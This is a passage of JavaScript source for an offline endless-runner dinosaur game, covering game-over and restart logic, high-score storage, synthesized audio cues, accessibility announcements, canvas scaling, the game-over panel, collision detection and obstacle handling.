      previousState = this.previousGamepad.buttons[buttonIndex].pressed;
    }
    // Generate key events on the rising and falling edge of a button press.
    if (state !== previousState) {
      const e = new KeyboardEvent(state ? Runner.events.KEYDOWN
                                      : Runner.events.KEYUP,
                                { keyCode: keyCode });
      document.dispatchEvent(e);
    }
  },

  /**
   * Handle interactions on the game over screen state.
   * A user is able to tap the high score twice to reset it.
   * @param {Event} e
   */
  handleGameOverClicks(e) {
    if (e.target != this.slowSpeedCheckbox) {
      e.preventDefault();
      if (this.distanceMeter.hasClickedOnHighScore(e) && this.highestScore) {
        if (this.distanceMeter.isHighScoreFlashing()) {
          // Subsequent click, reset the high score.
          this.saveHighScore(0, true);
          this.distanceMeter.resetHighScore();
        } else {
          // First click, flash the high score.
          this.distanceMeter.startHighScoreFlashing();
        }
      } else {
        this.distanceMeter.cancelHighScoreFlashing();
        this.restart();
      }
    }
  },

  /**
   * Returns whether the event was a left click on canvas.
   * On Windows right click is registered as a click.
   * @param {Event} e
   * @return {boolean}
   */
  isLeftClickOnCanvas(e) {
    return e.button != null && e.button < 2 &&
        e.type === Runner.events.POINTERUP &&
        (e.target === this.canvas ||
         (IS_MOBILE && Runner.audioCues && e.target === this.containerEl));
  },

  /**
   * RequestAnimationFrame wrapper.
   */
  scheduleNextUpdate() {
    if (!this.updatePending) {
      this.updatePending = true;
      this.raqId = requestAnimationFrame(this.update.bind(this));
    }
  },

  /**
   * Whether the game is running.
   * @return {boolean}
   */
  isRunning() {
    return !!this.raqId;
  },

  /**
   * Set the initial high score as stored in the user's profile.
   * @param {number} highScore
   */
  initializeHighScore(highScore) {
    this.syncHighestScore = true;
    highScore = Math.ceil(highScore);
    if (highScore < this.highestScore) {
      if (window.errorPageController) {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
      return;
    }
    this.highestScore = highScore;
    this.distanceMeter.setHighScore(this.highestScore);
  },

  /**
   * Sets the current high score and saves to the profile if available.
   * @param {number} distanceRan Total distance ran.
   * @param {boolean=} opt_resetScore Whether to reset the score.
   */
  saveHighScore(distanceRan, opt_resetScore) {
    this.highestScore = Math.ceil(distanceRan);
    this.distanceMeter.setHighScore(this.highestScore);

    // Store the new high score in the profile.
    if (this.syncHighestScore && window.errorPageController) {
      if (opt_resetScore) {
        errorPageController.resetEasterEggHighScore();
      } else {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
    }
  },

  /**
   * Game over state.
   */
  gameOver() {
    this.playSound(this.soundFx.HIT);
    vibrate(200);

    this.stop();
    this.crashed = true;
    this.distanceMeter.achievement = false;

    this.tRex.update(100, Trex.status.CRASHED);

    // Game over panel.
    if (!this.gameOverPanel) {
      const origSpriteDef = IS_HIDPI ?
          Runner.spriteDefinitionByType.original.HDPI :
          Runner.spriteDefinitionByType.original.LDPI;

      if (this.canvas) {
        if (Runner.isAltGameModeEnabled) {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions, origSpriteDef.ALT_GAME_END,
              this.altGameModeActive);
        } else {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions);
        }
      }
    }

    this.gameOverPanel.draw(this.altGameModeActive, this.tRex);

    // Update the high score.
    if (this.distanceRan > this.highestScore) {
      this.saveHighScore(this.distanceRan);
    }

    // Reset the time clock.
    this.time = getTimeStamp();

    if (Runner.audioCues) {
      this.generatedSoundFx.stopAll();
      announcePhrase(
          getA11yString(A11Y_STRINGS.gameOver)
              .replace(
                  '$1',
                  this.distanceMeter.getActualDistance(this.distanceRan)
                      .toString()) +
          ' ' +
          getA11yString(A11Y_STRINGS.highScore)
              .replace(
                  '$1',

                  this.distanceMeter.getActualDistance(this.highestScore)
                      .toString()));
      this.containerEl.setAttribute(
          'title', getA11yString(A11Y_STRINGS.ariaLabel));
    }
    this.showSpeedToggle();
    this.disableSpeedToggle(false);
  },

  stop() {
    this.setPlayStatus(false);
    this.paused = true;
    cancelAnimationFrame(this.raqId);
    this.raqId = 0;
    this.generatedSoundFx.stopAll();
  },

  play() {
    if (!this.crashed) {
      this.setPlayStatus(true);
      this.paused = false;
      this.tRex.update(0, Trex.status.RUNNING);
      this.time = getTimeStamp();
      this.update();
      this.generatedSoundFx.background();
    }
  },

  restart() {
    if (!this.raqId) {
      this.playCount++;
      this.runningTime = 0;
      this.setPlayStatus(true);
      this.toggleSpeed();
      this.paused = false;
      this.crashed = false;
      this.distanceRan = 0;
      this.setSpeed(this.config.SPEED);
      this.time = getTimeStamp();
      this.containerEl.classList.remove(Runner.classes.CRASHED);
      this.clearCanvas();
      this.distanceMeter.reset();
      this.horizon.reset();
      this.tRex.reset();
      this.playSound(this.soundFx.BUTTON_PRESS);
      this.invert(true);
      this.flashTimer = null;
      this.update();
      this.gameOverPanel.reset();
      this.generatedSoundFx.background();
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
      announcePhrase(getA11yString(A11Y_STRINGS.started));
    }
  },

  setPlayStatus(isPlaying) {
    if (this.touchController) {
      this.touchController.classList.toggle(HIDDEN_CLASS, !isPlaying);
    }
    this.playing = isPlaying;
  },

  /**
   * Whether the game should go into arcade mode.
   * @return {boolean}
   */
  isArcadeMode() {
    // In RTL languages the title is wrapped with the left to right mark
    // control characters &#x202A; and &#x202C but are invisible.
    return IS_RTL ? document.title.indexOf(ARCADE_MODE_URL) == 1 :
                    document.title === ARCADE_MODE_URL;
  },

  /**
   * Hides offline messaging for a fullscreen game only experience.
   */
  setArcadeMode() {
    document.body.classList.add(Runner.classes.ARCADE_MODE);
    this.setArcadeModeContainerScale();
  },

  /**
   * Sets the scaling for arcade mode.
   */
  setArcadeModeContainerScale() {
    const windowHeight = window.innerHeight;
    const scaleHeight = windowHeight / this.dimensions.HEIGHT;
    const scaleWidth = window.innerWidth / this.dimensions.WIDTH;
    const scale = Math.max(1, Math.min(scaleHeight, scaleWidth));
    const scaledCanvasHeight = this.dimensions.HEIGHT * scale;
    // Positions the game container at 10% of the available vertical window
    // height minus the game container height.
    const translateY = Math.ceil(Math.max(0, (windowHeight - scaledCanvasHeight -
        Runner.config.ARCADE_MODE_INITIAL_TOP_POSITION) *
        Runner.config.ARCADE_MODE_TOP_POSITION_PERCENT)) *
        window.devicePixelRatio;

    const cssScale = IS_RTL ? -scale + ',' + scale : scale;
    this.containerEl.style.transform =
        'scale(' + cssScale + ') translateY(' + translateY + 'px)';
  },

  /**
   * Pause the game if the tab is not in focus.
   */
  onVisibilityChange(e) {
    if (document.hidden || document.webkitHidden || e.type === 'blur' ||
        document.visibilityState !== 'visible') {
      this.stop();
    } else if (!this.crashed) {
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Play a sound.
   * @param {AudioBuffer} soundBuffer
   */
  playSound(soundBuffer) {
    if (soundBuffer) {
      const sourceNode = this.audioContext.createBufferSource();
      sourceNode.buffer = soundBuffer;
      sourceNode.connect(this.audioContext.destination);
      sourceNode.start(0);
    }
  },

  /**
   * Inverts the current page / canvas colors.
   * @param {boolean} reset Whether to reset colors.
   */
  invert(reset) {
    const htmlEl = document.firstElementChild;

    if (reset) {
      htmlEl.classList.toggle(Runner.classes.INVERTED,
          false);
      this.invertTimer = 0;
      this.inverted = false;
    } else {
      this.inverted = htmlEl.classList.toggle(
          Runner.classes.INVERTED, this.invertTrigger);
    }
  },
};


/**
 * Updates the canvas size taking into
 * account the backing store pixel ratio and
 * the device pixel ratio.
 *
 * See article by Paul Lewis:
 * http://www.html5rocks.com/en/tutorials/canvas/hidpi/
 *
 * @param {HTMLCanvasElement} canvas
 * @param {number=} opt_width
 * @param {number=} opt_height
 * @return {boolean} Whether the canvas was scaled.
 */
Runner.updateCanvasScaling = function(canvas, opt_width, opt_height) {
  const context =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));

  // Query the various pixel ratios
  const devicePixelRatio = Math.floor(window.devicePixelRatio) || 1;
  /** @suppress {missingProperties} */
  const backingStoreRatio =
      Math.floor(context.webkitBackingStorePixelRatio) || 1;
  const ratio = devicePixelRatio / backingStoreRatio;

  // Upscale the canvas if the two ratios don't match
  if (devicePixelRatio !== backingStoreRatio) {
    const oldWidth = opt_width || canvas.width;
    const oldHeight = opt_height || canvas.height;

    canvas.width = oldWidth * ratio;
    canvas.height = oldHeight * ratio;

    canvas.style.width = oldWidth + 'px';
    canvas.style.height = oldHeight + 'px';

    // Scale the context to counter the fact that we've manually scaled
    // our canvas element.
    context.scale(ratio, ratio);
    return true;
  } else if (devicePixelRatio === 1) {
    // Reset the canvas width / height. Fixes scaling bug when the page is
    // zoomed and the devicePixelRatio changes accordingly.
    canvas.style.width = canvas.width + 'px';
    canvas.style.height = canvas.height + 'px';
  }
  return false;
};


/**
 * Whether events are enabled.
 * @return {boolean}
 */
Runner.isAltGameModeEnabled = function() {
  return loadTimeData && loadTimeData.valueExists('enableAltGameMode');
};


/**
 * Generated sound FX class for audio cues.
 * @constructor
 */
function GeneratedSoundFx() {
  this.audioCues = false;
  this.context = null;
  this.panner = null;
}

GeneratedSoundFx.prototype = {
  init() {
    this.audioCues = true;
    if (!this.context) {
      // iOS only supports the webkit version.
      this.context = window.webkitAudioContext ? new webkitAudioContext() :
                                                 new AudioContext();
      if (IS_IOS) {
        this.context.onstatechange = (function() {
                                       if (this.context.state != 'running') {
                                         this.context.resume();
                                       }
                                     }).bind(this);
        this.context.resume();
      }
      this.panner = this.context.createStereoPanner ?
          this.context.createStereoPanner() :
          null;
    }
  },

  stopAll() {
    this.cancelFootSteps();
  },

  /**
   * Play oscillators at certain frequency and for a certain time.
   * @param {number} frequency
   * @param {number} startTime
   * @param {number} duration
   * @param {?number=} opt_vol
   * @param {number=} opt_pan
   */
  playNote(frequency, startTime, duration, opt_vol, opt_pan) {
    const osc1 = this.context.createOscillator();
    const osc2 = this.context.createOscillator();
    const volume = this.context.createGain();

    // Set oscillator wave type
    osc1.type = 'triangle';
    osc2.type = 'triangle';
    volume.gain.value = 0.1;

    // Set up node routing
    if (this.panner) {
      this.panner.pan.value = opt_pan || 0;
      osc1.connect(volume).connect(this.panner);
      osc2.connect(volume).connect(this.panner);
      this.panner.connect(this.context.destination);
    } else {
      osc1.connect(volume);
      osc2.connect(volume);
      volume.connect(this.context.destination);
    }

    // Detune oscillators for chorus effect
    osc1.frequency.value = frequency + 1;
    osc2.frequency.value = frequency - 2;

    // Fade out
    volume.gain.setValueAtTime(opt_vol || 0.01, startTime + duration - 0.05);
    volume.gain.linearRampToValueAtTime(0.00001, startTime + duration);

    // Start oscillators
    osc1.start(startTime);
    osc2.start(startTime);
    // Stop oscillators
    osc1.stop(startTime + duration);
    osc2.stop(startTime + duration);
  },

  background() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(493.883, now, 0.116);
      this.playNote(659.255, now + 0.116, 0.232);
      this.loopFootSteps();
    }
  },

  loopFootSteps() {
    if (this.audioCues && !this.bgSoundIntervalId) {
      this.bgSoundIntervalId = setInterval(function() {
        this.playNote(73.42, this.context.currentTime, 0.05, 0.16);
        this.playNote(69.30, this.context.currentTime + 0.116, 0.116, 0.16);
      }.bind(this), 280);
    }
  },

  cancelFootSteps() {
    if (this.audioCues && this.bgSoundIntervalId) {
      clearInterval(this.bgSoundIntervalId);
      this.bgSoundIntervalId = null;
      this.playNote(103.83, this.context.currentTime, 0.232, 0.02);
      this.playNote(116.54, this.context.currentTime + 0.116, 0.232, 0.02);
    }
  },

  collect() {
    if (this.audioCues) {
      this.cancelFootSteps();
      const now = this.context.currentTime;
      this.playNote(830.61, now, 0.116);
      this.playNote(1318.51, now + 0.116, 0.232);
    }
  },

  jump() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(659.25, now, 0.116, 0.3, -0.6);
      this.playNote(880, now + 0.116, 0.232, 0.3, -0.6);
    }
  },
};


/**
 * Speak a phrase using Speech Synthesis API for a11y.
 * @param {string} phrase Sentence to speak.
 */
function speakPhrase(phrase) {
  if ('speechSynthesis' in window) {
    const msg = new SpeechSynthesisUtterance(phrase);
    const voices = window.speechSynthesis.getVoices();
    msg.text = phrase;
    speechSynthesis.speak(msg);
  }
}


/**
 * For screen readers make an announcement to the live region.
 * @param {string} phrase Sentence to speak.
 */
function announcePhrase(phrase) {
  if (Runner.a11yStatusEl) {
    Runner.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl.textContent = phrase;
  }
}


/**
 * Returns a string from loadTimeData data object.
 * @param {string} stringName
 * @return {string}
 */
function getA11yString(stringName) {
  return loadTimeData && loadTimeData.valueExists(stringName) ?
      loadTimeData.getString(stringName) :
      '';
}


/**
 * Get random number.
 * @param {number} min
 * @param {number} max
 */
function getRandomNum(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}


/**
 * Vibrate on mobile devices.
 * @param {number} duration Duration of the vibration in milliseconds.
 */
function vibrate(duration) {
  if (IS_MOBILE && window.navigator.vibrate) {
    window.navigator.vibrate(duration);
  }
}


/**
 * Create canvas element.
 * @param {Element} container Element to append canvas to.
 * @param {number} width
 * @param {number} height
 * @param {string=} opt_classname
 * @return {HTMLCanvasElement}
 */
function createCanvas(container, width, height, opt_classname) {
  const canvas =
      /** @type {!HTMLCanvasElement} */ (document.createElement('canvas'));
  canvas.className = opt_classname ? Runner.classes.CANVAS + ' ' +
      opt_classname : Runner.classes.CANVAS;
  canvas.width = width;
  canvas.height = height;
  container.appendChild(canvas);

  return canvas;
}


/**
 * Decodes the base 64 audio to ArrayBuffer used by Web Audio.
 * @param {string} base64String
 */
function decodeBase64ToArrayBuffer(base64String) {
  const len = (base64String.length / 4) * 3;
  const str = atob(base64String);
  const arrayBuffer = new ArrayBuffer(len);
  const bytes = new Uint8Array(arrayBuffer);

  for (let i = 0; i < len; i++) {
    bytes[i] = str.charCodeAt(i);
  }
  return bytes.buffer;
}


/**
 * Return the current timestamp.
 * @return {number}
 */
function getTimeStamp() {
  return IS_IOS ? new Date().getTime() : performance.now();
}


//******************************************************************************


/**
 * Game over panel.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} textImgPos
 * @param {Object} restartImgPos
 * @param {!Object} dimensions Canvas dimensions.
 * @param {Object=} opt_altGameEndImgPos
 * @param {boolean=} opt_altGameActive
 * @constructor
 */
function GameOverPanel(
    canvas, textImgPos, restartImgPos, dimensions, opt_altGameEndImgPos,
    opt_altGameActive) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.canvasDimensions = dimensions;
  this.textImgPos = textImgPos;
  this.restartImgPos = restartImgPos;
  this.altGameEndImgPos = opt_altGameEndImgPos;
  this.altGameModeActive = opt_altGameActive;

  // Retry animation.
  this.frameTimeStamp = 0;
  this.animTimer = 0;
  this.currentFrame = 0;

  this.gameOverRafId = null;

  this.flashTimer = 0;
  this.flashCounter = 0;
  this.originalText = true;
}

GameOverPanel.RESTART_ANIM_DURATION = 875;
GameOverPanel.LOGO_PAUSE_DURATION = 875;
GameOverPanel.FLASH_ITERATIONS = 5;

/**
 * Animation frames spec.
 */
GameOverPanel.animConfig = {
  frames: [0, 36, 72, 108, 144, 180, 216, 252],
  msPerFrame: GameOverPanel.RESTART_ANIM_DURATION / 8,
};

/**
 * Dimensions used in the panel.
 * @enum {number}
 */
GameOverPanel.dimensions = {
  TEXT_X: 0,
  TEXT_Y: 13,
  TEXT_WIDTH: 191,
  TEXT_HEIGHT: 11,
  RESTART_WIDTH: 36,
  RESTART_HEIGHT: 32,
};


GameOverPanel.prototype = {
  /**
   * Update the panel dimensions.
   * @param {number} width New canvas width.
   * @param {number} opt_height Optional new canvas height.
   */
  updateDimensions(width, opt_height) {
    this.canvasDimensions.WIDTH = width;
    if (opt_height) {
      this.canvasDimensions.HEIGHT = opt_height;
    }
    this.currentFrame = GameOverPanel.animConfig.frames.length - 1;
  },

  drawGameOverText(dimensions, opt_useAltText) {
    const centerX = this.canvasDimensions.WIDTH / 2;
    let textSourceX = dimensions.TEXT_X;
    let textSourceY = dimensions.TEXT_Y;
    let textSourceWidth = dimensions.TEXT_WIDTH;
    let textSourceHeight = dimensions.TEXT_HEIGHT;

    const textTargetX = Math.round(centerX - (dimensions.TEXT_WIDTH / 2));
    const textTargetY = Math.round((this.canvasDimensions.HEIGHT - 25) / 3);
    const textTargetWidth = dimensions.TEXT_WIDTH;
    const textTargetHeight = dimensions.TEXT_HEIGHT;

    if (IS_HIDPI) {
      textSourceY *= 2;
      textSourceX *= 2;
      textSourceWidth *= 2;
      textSourceHeight *= 2;
    }

    if (!opt_useAltText) {
      textSourceX += this.textImgPos.x;
      textSourceY += this.textImgPos.y;
    }

    const spriteSource =
        opt_useAltText ? Runner.altCommonImageSprite : Runner.origImageSprite;

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    // Game over text from sprite.
    this.canvasCtx.drawImage(
        spriteSource, textSourceX, textSourceY, textSourceWidth,
        textSourceHeight, textTargetX, textTargetY, textTargetWidth,
        textTargetHeight);

    this.canvasCtx.restore();
  },

  /**
   * Draw additional adornments for alternative game types.
   */
  drawAltGameElements(tRex) {
    // Additional adornments.
    if (this.altGameModeActive && Runner.spriteDefinition.ALT_GAME_END_CONFIG) {
      const altGameEndConfig = Runner.spriteDefinition.ALT_GAME_END_CONFIG;

      let altGameEndSourceWidth = altGameEndConfig.WIDTH;
      let altGameEndSourceHeight = altGameEndConfig.HEIGHT;
      const altGameEndTargetX = tRex.xPos + altGameEndConfig.X_OFFSET;
      const altGameEndTargetY = tRex.yPos + altGameEndConfig.Y_OFFSET;

      if (IS_HIDPI) {
        altGameEndSourceWidth *= 2;
        altGameEndSourceHeight *= 2;
      }

      this.canvasCtx.drawImage(
          Runner.altCommonImageSprite, this.altGameEndImgPos.x,
          this.altGameEndImgPos.y, altGameEndSourceWidth,
          altGameEndSourceHeight, altGameEndTargetX, altGameEndTargetY,
          altGameEndConfig.WIDTH, altGameEndConfig.HEIGHT);
    }
  },

  /**
   * Draw restart button.
   */
  drawRestartButton() {
    const dimensions = GameOverPanel.dimensions;
    let framePosX = GameOverPanel.animConfig.frames[this.currentFrame];
    let restartSourceWidth = dimensions.RESTART_WIDTH;
    let restartSourceHeight = dimensions.RESTART_HEIGHT;
    const restartTargetX =
        (this.canvasDimensions.WIDTH / 2) - (dimensions.RESTART_WIDTH / 2);
    const restartTargetY = this.canvasDimensions.HEIGHT / 2;

    if (IS_HIDPI) {
      restartSourceWidth *= 2;
      restartSourceHeight *= 2;
      framePosX *= 2;
    }

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    this.canvasCtx.drawImage(
        Runner.origImageSprite, this.restartImgPos.x + framePosX,
        this.restartImgPos.y, restartSourceWidth, restartSourceHeight,
        restartTargetX, restartTargetY, dimensions.RESTART_WIDTH,
        dimensions.RESTART_HEIGHT);
    this.canvasCtx.restore();
  },


  /**
   * Draw the panel.
   * @param {boolean} opt_altGameModeActive
   * @param {!Trex} opt_tRex
   */
  draw(opt_altGameModeActive, opt_tRex) {
    if (opt_altGameModeActive) {
      this.altGameModeActive = opt_altGameModeActive;
    }

    this.drawGameOverText(GameOverPanel.dimensions, false);
    this.drawRestartButton();
    this.drawAltGameElements(opt_tRex);
    this.update();
  },

  /**
   * Update animation frames.
   */
  update() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);

    this.frameTimeStamp = now;
    this.animTimer += deltaTime;
    this.flashTimer += deltaTime;

    // Restart Button
    if (this.currentFrame == 0 &&
        this.animTimer > GameOverPanel.LOGO_PAUSE_DURATION) {
      this.animTimer = 0;
      this.currentFrame++;
      this.drawRestartButton();
    } else if (
        this.currentFrame > 0 &&
        this.currentFrame < GameOverPanel.animConfig.frames.length) {
      if (this.animTimer >= GameOverPanel.animConfig.msPerFrame) {
        this.currentFrame++;
        this.drawRestartButton();
      }
    } else if (
        !this.altGameModeActive &&
        this.currentFrame == GameOverPanel.animConfig.frames.length) {
      this.reset();
      return;
    }

    // Game over text
    if (this.altGameModeActive &&
        Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG) {
      const altTextConfig =
          Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG;

      if (this.flashCounter < GameOverPanel.FLASH_ITERATIONS &&
          this.flashTimer > altTextConfig.FLASH_DURATION) {
        this.flashTimer = 0;
        this.originalText = !this.originalText;

        this.clearGameOverTextBounds();
        if (this.originalText) {
          this.drawGameOverText(GameOverPanel.dimensions, false);
          this.flashCounter++;
        } else {
          this.drawGameOverText(altTextConfig, true);
        }
      } else if (this.flashCounter >= GameOverPanel.FLASH_ITERATIONS) {
        this.reset();
        return;
      }
    }

    this.gameOverRafId = requestAnimationFrame(this.update.bind(this));
  },

  /**
   * Clear game over text.
   */
  clearGameOverTextBounds() {
    this.canvasCtx.save();

    this.canvasCtx.clearRect(
        Math.round(
            this.canvasDimensions.WIDTH / 2 -
            (GameOverPanel.dimensions.TEXT_WIDTH / 2)),
        Math.round((this.canvasDimensions.HEIGHT - 25) / 3),
        GameOverPanel.dimensions.TEXT_WIDTH,
        GameOverPanel.dimensions.TEXT_HEIGHT + 4);
    this.canvasCtx.restore();
  },

  reset() {
    if (this.gameOverRafId) {
      cancelAnimationFrame(this.gameOverRafId);
      this.gameOverRafId = null;
    }
    this.animTimer = 0;
    this.frameTimeStamp = 0;
    this.currentFrame = 0;
    this.flashTimer = 0;
    this.flashCounter = 0;
    this.originalText = true;
  },
};


//******************************************************************************

/**
 * Check for a collision.
 * @param {!Obstacle} obstacle
 * @param {!Trex} tRex T-rex object.
 * @param {CanvasRenderingContext2D=} opt_canvasCtx Optional canvas context for
 *    drawing collision boxes.
 * @return {Array<CollisionBox>|undefined}
 */
function checkForCollision(obstacle, tRex, opt_canvasCtx) {
  const obstacleBoxXPos = Runner.defaultDimensions.WIDTH + obstacle.xPos;

  // Adjustments are made to the bounding box as there is a 1 pixel white
  // border around the t-rex and obstacles.
  const tRexBox = new CollisionBox(
      tRex.xPos + 1,
      tRex.yPos + 1,
      tRex.config.WIDTH - 2,
      tRex.config.HEIGHT - 2);

  const obstacleBox = new CollisionBox(
      obstacle.xPos + 1,
      obstacle.yPos + 1,
      obstacle.typeConfig.width * obstacle.size - 2,
      obstacle.typeConfig.height - 2);

  // Debug outer box
  if (opt_canvasCtx) {
    drawCollisionBoxes(opt_canvasCtx, tRexBox, obstacleBox);
  }

  // Simple outer bounds check.
  if (boxCompare(tRexBox, obstacleBox)) {
    const collisionBoxes = obstacle.collisionBoxes;
    let tRexCollisionBoxes = [];

    if (Runner.isAltGameModeEnabled()) {
      tRexCollisionBoxes = Runner.spriteDefinition.TREX.COLLISION_BOXES;
    } else {
      tRexCollisionBoxes = tRex.ducking ? Trex.collisionBoxes.DUCKING :
                                          Trex.collisionBoxes.RUNNING;
    }

    // Detailed axis aligned box check.
    for (let t = 0; t < tRexCollisionBoxes.length; t++) {
      for (let i = 0; i < collisionBoxes.length; i++) {
        // Adjust the box to actual positions.
        const adjTrexBox =
            createAdjustedCollisionBox(tRexCollisionBoxes[t], tRexBox);
        const adjObstacleBox =
            createAdjustedCollisionBox(collisionBoxes[i], obstacleBox);
        const crashed = boxCompare(adjTrexBox, adjObstacleBox);

        // Draw boxes for debug.
        if (opt_canvasCtx) {
          drawCollisionBoxes(opt_canvasCtx, adjTrexBox, adjObstacleBox);
        }

        if (crashed) {
          return [adjTrexBox, adjObstacleBox];
        }
      }
    }
  }
}


/**
 * Adjust the collision box.
 * @param {!CollisionBox} box The original box.
 * @param {!CollisionBox} adjustment Adjustment box.
 * @return {CollisionBox} The adjusted collision box object.
 */
function createAdjustedCollisionBox(box, adjustment) {
  return new CollisionBox(
      box.x + adjustment.x,
      box.y + adjustment.y,
      box.width,
      box.height);
}


/**
 * Draw the collision boxes for debug.
 */
function drawCollisionBoxes(canvasCtx, tRexBox, obstacleBox) {
  canvasCtx.save();
  canvasCtx.strokeStyle = '#f00';
  canvasCtx.strokeRect(tRexBox.x, tRexBox.y, tRexBox.width, tRexBox.height);

  canvasCtx.strokeStyle = '#0f0';
  canvasCtx.strokeRect(obstacleBox.x, obstacleBox.y,
      obstacleBox.width, obstacleBox.height);
  canvasCtx.restore();
}


/**
 * Compare two collision boxes for a collision.
 * @param {CollisionBox} tRexBox
 * @param {CollisionBox} obstacleBox
 * @return {boolean} Whether the boxes intersected.
 */
function boxCompare(tRexBox, obstacleBox) {
  let crashed = false;
  const tRexBoxX = tRexBox.x;
  const tRexBoxY = tRexBox.y;

  const obstacleBoxX = obstacleBox.x;
  const obstacleBoxY = obstacleBox.y;

  // Axis-Aligned Bounding Box method.
  if (tRexBox.x < obstacleBoxX + obstacleBox.width &&
      tRexBox.x + tRexBox.width > obstacleBoxX &&
      tRexBox.y < obstacleBox.y + obstacleBox.height &&
      tRexBox.height + tRexBox.y > obstacleBox.y) {
    crashed = true;
  }

  return crashed;
}


//******************************************************************************

/**
 * Collision box object.
 * @param {number} x X position.
 * @param {number} y Y Position.
 * @param {number} w Width.
 * @param {number} h Height.
 * @constructor
 */
function CollisionBox(x, y, w, h) {
  this.x = x;
  this.y = y;
  this.width = w;
  this.height = h;
}


//******************************************************************************

/**
 * Obstacle.
 * @param {CanvasRenderingContext2D} canvasCtx
 * @param {ObstacleType} type
 * @param {Object} spriteImgPos Obstacle position in sprite.
 * @param {Object} dimensions
 * @param {number} gapCoefficient Mutipler in determining the gap.
 * @param {number} speed
 * @param {number=} opt_xOffset
 * @param {boolean=} opt_isAltGameMode
 * @constructor
 */
function Obstacle(
    canvasCtx, type, spriteImgPos, dimensions, gapCoefficient, speed,
    opt_xOffset, opt_isAltGameMode) {
  this.canvasCtx = canvasCtx;
  this.spritePos = spriteImgPos;
  this.typeConfig = type;
  this.gapCoefficient = Runner.slowDown ? gapCoefficient * 2 : gapCoefficient;
  this.size = getRandomNum(1, Obstacle.MAX_OBSTACLE_LENGTH);
  this.dimensions = dimensions;
  this.remove = false;
  this.xPos = dimensions.WIDTH + (opt_xOffset || 0);
  this.yPos = 0;
  this.width = 0;
  this.collisionBoxes = [];
  this.gap = 0;
  this.speedOffset = 0;
  this.altGameModeActive = opt_isAltGameMode;
  this.imageSprite = this.typeConfig.type == 'COLLECTABLE' ?
      Runner.altCommonImageSprite :
      this.altGameModeActive ? Runner.altGameImageSprite : Runner.imageSprite;

  // For animated obstacles.
  this.currentFrame = 0;
  this.timer = 0;

  this.init(speed);
}

/**
 * Coefficient for calculating the maximum gap.
 */
Obstacle.MAX_GAP_COEFFICIENT = 1.5;

/**
 * Maximum obstacle grouping count.
 */
Obstacle.MAX_OBSTACLE_LENGTH = 3;


Obstacle.prototype = {
  /**
   * Initialise the DOM for the obstacle.
   * @param {number} speed
   */
  init(speed) {
    this.cloneCollisionBoxes();

    // Only allow sizing if we're at the right speed.
    if (this.size > 1 && this.typeConfig.multipleSpeed > speed) {
      this.size = 1;
    }

    this.width = this.typeConfig.width * this.size;

    // Check if obstacle can be positioned at various heights.
    if (Array.isArray(this.typeConfig.yPos)) {
      const yPosConfig =
          IS_MOBILE ? this.typeConfig.yPosMobile : this.typeConfig.yPos;
      this.yPos = yPosConfig[getRandomNum(0, yPosConfig.length - 1)];
    } else {
      this.yPos = this.typeConfig.yPos;
    }

    this.draw();

    // Make collision box adjustments,
    // Central box is adjusted to the size as one box.
    //      ____        ______        ________
    //    _|   |-|    _|     |-|    _|       |-|
    //   | |<->| |   | |<--->| |   | |<----->| |
    //   | | 1 | |   | |  2  | |   | |   3   | |
    //   |_|___|_|   |_|_____|_|   |_|_______|_|
    //
    if (this.size > 1) {
      this.collisionBoxes[1].width = this.width - this.collisionBoxes[0].width -
          this.collisionBoxes[2].width;
      this.collisionBoxes[2].x = this.width - this.collisionBoxes[2].width;
    }

    // For obstacles that go at a different speed from the horizon.
    if (this.typeConfig.speedOffset) {
      this.speedOffset = Math.random() > 0.5 ? this.typeConfig.speedOffset :
                                               -this.typeConfig.speedOffset;
    }

    this.gap = this.getGap(this.gapCoefficient, speed);

    // Increase gap for audio cues enabled.
    if (Runner.audioCues) {
      this.gap *= 2;
    }
  },

  /**
   * Draw and crop based on size.
   */
  draw() {
    let sourceWidth = this.typeConfig.width;
    let sourceHeight = this.typeConfig.height;

    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    // X position in sprite.
    let sourceX =
        (sourceWidth * this.size) * (0.5 * (this.size - 1)) + this.spritePos.x;

    // Animation frames.
    if (this.currentFrame > 0) {
      sourceX += sourceWidth * this.currentFrame;
    }

    this.canvasCtx.drawImage(
        this.imageSprite, sourceX, this.spritePos.y, sourceWidth * this.size,
        sourceHeight, this.xPos, this.yPos, this.typeConfig.width * this.size,
        this.typeConfig.height);
  },

  /**
   * Obstacle frame update.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    if (!this.remove) {
      if (this.typeConfig.speedOffset) {
        speed += this.speedOffset;
      }
      this.xPos -= Math.floor((speed * FPS / 1000) * deltaTime);

      // Update frame
      if (this.typeConfig.numFrames) {
        this.timer += deltaTime;
        if (this.timer >= this.typeConfig.frameRate) {
          this.currentFrame =
              this.currentFrame === this.typeConfig.numFrames - 1 ?
              0 :
              this.currentFrame + 1;
          this.timer = 0;
        }
      }
      this.draw();

      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Calculate a random gap size.
